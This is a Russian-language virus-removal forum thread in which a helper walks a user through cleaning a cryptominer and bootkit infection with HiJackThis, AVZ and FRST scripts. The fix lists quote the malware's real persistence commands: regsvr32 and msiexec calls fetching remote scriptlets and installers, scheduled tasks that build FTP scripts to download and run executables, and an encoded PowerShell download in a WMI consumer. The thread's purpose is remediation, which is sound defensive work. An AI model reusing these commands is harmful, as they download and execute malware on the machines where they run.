Не запускаются браузеры, подозрение на майнер [Trojan.Win32.Siscos.zan]

Printable View

21.06.2019, 15:10
Allexan

Вложений: 1

Не запускаются браузеры, подозрение на майнер [Trojan.Win32.Siscos.zan]

Здравствуйте!
Во вложении - лог.
При старте подвисает, браузеры не запускаются.
Спасибо.
21.06.2019, 15:11
Info_bot

Уважаемый(ая) [B]Allexan[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
21.06.2019, 22:51
SQ

Здравствуйте,

HiJackThis (из каталога [B]autologger[/B])[URL=http://virusinfo.info/showthread.php?t=4491&p=64376&viewfull=1#post64376]профиксить[/URL]
[B]Важно[/B]: необходимо отметить и профиксить [B]только[/B] то, что указано ниже.
[CODE]
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll (HKLM) (2019/06/20)
O4 - MSConfig\startupreg: start1 [command] = C:\Windows\system32\msiexec.exe /i http://js.1226bye.xyz:280/helloworld.msi /q (HKLM) (2019/06/20)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/06/20) - {0263e8a9-e3d0-4f80-a12d-dfe61fa0739c} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.0603bye.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.0603bye.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
[/CODE]

AVZ [URL=http://virusinfo.info/showthread.php?t=7239&p=88804&viewfull=1#post88804]выполнить следующий скрипт[/URL].
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
[CODE]
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
StopService('clr_optimization_v4.0.30328_64');
StopService('RpcEpt');
DeleteService('RpcEpt');
DeleteService('clr_optimization_v4.0.30328_64');
QuarantineFile('C:\Windows\inf\lsmm.exe','');
QuarantineFile('C:\Windows\debug\item.dat','');
QuarantineFile('a.exe','');
QuarantineFile('c:\windows\update.exe','');
QuarantineFile('c:\windows\debug\item.dat','');
QuarantineFile('c:\windows\help\lsmosee.exe','');
QuarantineFile('c:\windows\debug\ok.dat','');
QuarantineFile('C:\Windows\system32\dwm.exe','');
QuarantineFile('C:\Windows\svchost.exe','');
QuarantineFile('C:\ProgramData\clr_optimization_v4.0.30328_64\svchost.exe','');
DeleteFile('C:\ProgramData\clr_optimization_v4.0.30328_64\svchost.exe','32');
DeleteFile('C:\Windows\svchost.exe','32');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','command');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command');
DeleteFile('C:\Windows\system32\Tasks\Mysa','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa3','64');
DeleteFile('C:\Windows\system32\Tasks\ok','64');
DeleteFile('c:\windows\debug\ok.dat','32');
DeleteFile('c:\windows\help\lsmosee.exe','32');
DeleteFile('c:\windows\debug\item.dat','32');
DeleteFile('c:\windows\update.exe','32');
DeleteFile('C:\Windows\debug\item.dat','32');
DeleteFile('C:\Windows\inf\lsmm.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
[/CODE]

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:
[CODE]
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
[/CODE]
Файл quarantine.zip из папки AVZ загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.

- Подготовьте лог [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]AdwCleaner[/URL] и приложите его в теме.
04.07.2019, 13:10
Allexan

Вложений: 1

Здравствуйте!
[QUOTE=SQ;1501368]- Подготовьте лог [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]AdwCleaner[/URL] и приложите его в теме.[/QUOTE]
Лог во вложении.
Спасибо.
04.07.2019, 15:19
SQ

- Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]https://i.corovin.info/FRST_Icon.png[/img] и сохраните на Рабочем столе.

[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"SigCheckExt"[/i].
[img]https://i.corovin.info/FRST.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
21.07.2019, 23:24
Allexan

Вложений: 2

[QUOTE=SQ;1501905] создан отчет [/list][/QUOTE]

FRST.txt и Addition.txt
прикреплены.
Спасибо.
22.07.2019, 05:54
SQ

[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Start::
CreateRestorePoint:
CloseProcesses:
(TODO: <公司名>) [File not signed] C:\Windows\Temp\conhost.exe
(www.xmrig.com) [File not signed] C:\Windows\inf\lsmm.exe
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.0603bye.info:280/v.sct scrobj.dll <==== ATTENTION
Task: {5365EC51-CC0C-415F-93A3-94923E107E48} - System32\Tasks\Mysa2 => cmd /c echo open ftp.0603bye.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {7F358935-AE38-4032-873B-C3B06ED19E82} - \GoogleUpdateTaskMachineCore -> No File <==== ATTENTION
Task: {7F8DE60A-E89F-4292-898A-CFE16C941552} - \GoogleUpdateTaskMachineUA -> No File <==== ATTENTION
Task: {80344AF6-9EB5-4623-8060-29B8604FE2BA} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {8041CCC5-FA98-4BD3-8059-D94D77DAAEE4} - System32\Tasks\Mysa => cmd /c echo open ftp.0603bye.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {827B8CD5-F552-4594-A1B4-D42AC6C66CD0} - System32\Tasks\Mysa3 => cmd /c echo open ftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {934EAC10-6E6B-4052-B003-F3EAA453F72A} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {95262626-24A8-4861-9EC3-5BCDE9F8E7A0} - \Adobe Acrobat Update Task -> No File <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{9a2ccd15-7b03-4b75-872c-3c373288d183} <==== ATTENTION (Restriction - IP)
CHR Extension: (Chrome Media Router) - C:\Users\Boris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-06-20]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
Zip: C:\ProgramData\clr_optimization_v4.0.30328_64\svchost.exe;C:\Windows\svchost.exe;C:\Windows\SysWOW64\Drivers\64.exe;C:\Windows\cc64.exe;C:\Windows\ccc.exe;C:\Windows\system32\ok.exe;C:\Windows\service.exe;C:\Windows\qeriuwjhrf;C:\Windows\tasksche.exe;C:\Windows\system32\upsupx.exe;C:\Windows\system32\u.exe;C:\Windows\SysWOW64\CSVer.dll
R2 clr_optimization_v4.0.30328_64; C:\ProgramData\clr_optimization_v4.0.30328_64\svchost.exe [1231360 2019-07-06] () [File not signed]
S2 RpcEpt; C:\Windows\svchost.exe [106496 2019-07-06] () [File not signed] <==== ATTENTION
File: C:\Windows\SysWOW64\Drivers\64.exe
2019-07-06 11:57 - 2019-07-06 12:49 - 003514368 ____S C:\Windows\tasksche.exe
2019-07-06 11:57 - 2019-07-06 11:58 - 002061938 ____S C:\Windows\qeriuwjhrf
2019-07-06 01:28 - 2019-07-06 01:29 - 001231360 _____ C:\Windows\service.exe
2019-07-06 01:27 - 2019-07-06 01:27 - 000106496 _____ C:\Windows\cc64.exe
2019-07-06 01:22 - 2019-07-06 01:24 - 002363733 _____ C:\Windows\ccc.exe
2019-07-06 01:20 - 2019-07-06 01:20 - 000106496 _____ C:\Windows\svchost.exe
2019-07-03 22:30 - 2019-07-16 00:10 - 002241024 _____ C:\Windows\system32\ok.exe
2019-07-03 22:30 - 2019-07-16 00:10 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
2019-07-03 22:30 - 2019-07-04 22:41 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
2019-06-25 08:11 - 2019-07-21 22:40 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
2019-06-25 08:11 - 2019-07-21 22:40 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2019-06-25 08:11 - 2019-07-21 22:40 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2019-06-25 08:11 - 2019-07-21 22:40 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-06-25 08:11 - 2019-07-21 22:40 - 000003186 _____ C:\Windows\System32\Tasks\ok
2019-07-21 22:39 - 2019-03-29 21:26 - 000000081 _____ C:\Windows\system32\s
2019-07-21 22:39 - 2019-03-29 21:26 - 000000079 _____ C:\Windows\system32\ps
2019-07-21 22:39 - 2019-03-29 21:26 - 000000077 _____ C:\Windows\system32\p
2019-07-06 01:27 - 2019-07-06 01:27 - 000106496 _____ C:\Windows\cc64.exe
2019-07-06 01:22 - 2019-07-06 01:24 - 002363733 _____ C:\Windows\ccc.exe
2019-07-06 01:28 - 2019-07-06 01:29 - 001231360 _____ C:\Windows\service.exe
2019-07-06 01:20 - 2019-07-06 01:20 - 000106496 _____ C:\Windows\svchost.exe
2019-07-06 11:57 - 2019-07-06 12:49 - 003514368 ____S C:\Windows\tasksche.exe
2019-07-03 22:30 - 2019-07-16 00:10 - 002241024 _____ C:\Windows\system32\ok.exe
2019-07-03 22:30 - 2019-07-04 22:41 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
2019-07-03 22:30 - 2019-07-16 00:10 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"fuckyoumm2_filter\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 666 more characters).] <==== ATTENTION
Reboot:
End::
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]

На рабочем столе образуется карантин вида [B]<date>.zip[/B] загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
23.07.2019, 22:49
Allexan

Вложений: 1

[QUOTE=SQ;1502594]создаст лог-файл [b](Fixlog.txt)[/b].[/QUOTE]
Во вложении

[QUOTE=SQ;1502594]
На рабочем столе образуется карантин вида [B]<date>.zip[/B] [/QUOTE]
Появилось два файла:
23.07.2019_22.10.53.zip
и
23.07.2019_22.10.54.zip
Во вложении

После работы FRST и перезагрузки в процессах присутствует процесс conhost.exe с названием "TODO: <公司名> "

В автозагрузке ( msconfig ) уже после перезагрузки присутствовала запись
regsrv32 /u /s /i:h ttp://js.0603bye.info:280/v.sct.scrobj.dll

Спасибо.
23.07.2019, 23:23
SQ

Скорее всго вирус находится в загрузочном секторе поэтому после перегрузке он восстанавливается.

- Покажите лог [URL="http://media.kaspersky.com/utilities/VirusUtilities/RU/tdsskiller.exe"]TDSSKiller[/URL]
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)

P.S. Важно самостоятельно ничего не удаляйте.
24.07.2019, 23:34
Allexan

Вложений: 1

[QUOTE=SQ;1502692]
Файл C:\TDSSKiller.***_log.txt приложите в теме. [/QUOTE]

В памяти обнаружен Rootkit.Win64.DarkGalaxy.a
На диске обнаружен Device\Harddisk0\DR0 Rootkit.Boot.DarkGalaxy.a
Произведено лечение TDSSKiller'ом.
После перезагрузки в процессах чисто, несмотря на наличие
в автозагрузке ( msconfig ) :
regsrv32 /u /s /i:h ttp://js.0603bye.info:280/v.sct.scrobj.dll
Спасибо.
25.07.2019, 00:12
SQ

да, необходимо было вылечить rootkit.Boot.DarkGalaxy.a

Приложите новые логи FRST, зачистим все остальное.
26.07.2019, 00:28
Allexan

Вложений: 1

[QUOTE=SQ;1502758]Приложите новые логи FRST[/QUOTE]
Во вложении.
Спасибо.
26.07.2019, 16:36
SQ

[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Start::
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b2d68c0a-d606-4ea6-a12f-9dcd407d25fe} <==== ATTENTION (Restriction - IP)
File: C:\Program Files (x86)\AnyDesk\AnyDesk.exe
File: C:\Program Files\Unlocker\UnlockerDriver5.sys
2019-07-25 23:20 - 2019-07-25 23:20 - 002241024 _____ C:\Windows\system32\ok.exe
2019-07-25 23:20 - 2019-07-25 23:20 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
2019-07-25 23:20 - 2019-07-25 23:20 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
2019-07-24 07:41 - 2019-07-25 20:18 - 000000081 _____ C:\Windows\system32\s
2019-07-24 07:41 - 2019-07-25 20:18 - 000000079 _____ C:\Windows\system32\ps
2019-07-24 07:41 - 2019-07-25 20:18 - 000000077 _____ C:\Windows\system32\p
2019-07-23 22:35 - 2019-07-25 23:20 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
2019-07-23 22:35 - 2019-07-25 23:20 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2019-07-23 22:35 - 2019-07-25 23:20 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2019-07-23 22:35 - 2019-07-25 23:20 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-07-23 22:35 - 2019-07-25 23:20 - 000003186 _____ C:\Windows\System32\Tasks\ok
File: C:\Windows\SysWOW64\Drivers\64.exe
File: C:\Windows\system32\IEUDINIT.EXE
Folder: C:\Windows\IME
2019-07-25 23:20 - 2019-03-30 00:28 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
2019-07-25 23:20 - 2019-07-25 23:20 - 002241024 _____ C:\Windows\system32\ok.exe
2019-07-25 23:20 - 2019-07-25 23:20 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
2019-07-25 23:20 - 2019-07-25 23:20 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
File: C:\Windows\SysWOW64\CSVer.dll
Reboot:
End::
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
26.07.2019, 16:46
CyberHelper

=C8=F2=EE=E3 =EB=E5=F7=E5=ED=E8=FF

=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
[LIST][*]=CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: [B]5[/B][*]=CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: [B]16[/B][*]=C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
=E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
[LIST=3D1][*] \ccc.exe - [B]HEUR:Trojan.Win32.Generic[/B] ( AVAST4: Win32:Malwa=
re-gen )[*] \cc64.exe - [B]Trojan.Win32.Siscos.zan[/B] ( BitDefender: Gen:Var=
iant.Symmi.50843, AVAST4: Win32:Trojan-gen )[*] c:\windows\debug\item.dat - [B]UDS:DangerousObject.Multi.Generi=
c[/B] ( AVAST4: Win32:Trojan-gen )[*] c:\windows\inf\lsmm.exe - [B]not-a-virus:HEUR:RiskTool.Win32.Bi=
tCoinMiner.gen[/B] ( AVAST4: Win32:CryptoMiner-L [Trj] )[*] \ok.exe - [B]UDS:DangerousObject.Multi.Generic[/B] ( AVAST4: Win3=
2:Trojan-gen )[*] \qeriuwjhrf - [B]UDS:DangerousObject.Multi.Generic[/B] ( AVAST4: =
Win32:Malware-gen )[*] \svchost.exe - [B]UDS:DangerousObject.Multi.Generic[/B] ( AVAST4:=
Win32:Miner-AY [Trj] )[*] \svchost.exe - [B]Trojan.Win32.Siscos.zan[/B] ( BitDefender: Gen:=
Variant.Symmi.50843, AVAST4: Win32:Trojan-gen )[*] \tasksche.exe - [B]Trojan-Ransom.Win32.Wanna.zbu[/B] ( BitDefende=
r: Gen:Trojan.Heur.RP.wtW@aGEmS3di )[*] \u.exe - [B]VHO:Trojan-Downloader.Win32.Agentb.gen[/B] ( AVAST4: =
Win32:Trojan-gen )[*] \upsupx.exe - [B]Trojan.Win64.Miner.kau[/B] ( AVAST4: Win32:Malwa=
re-gen )[/LIST][/LIST]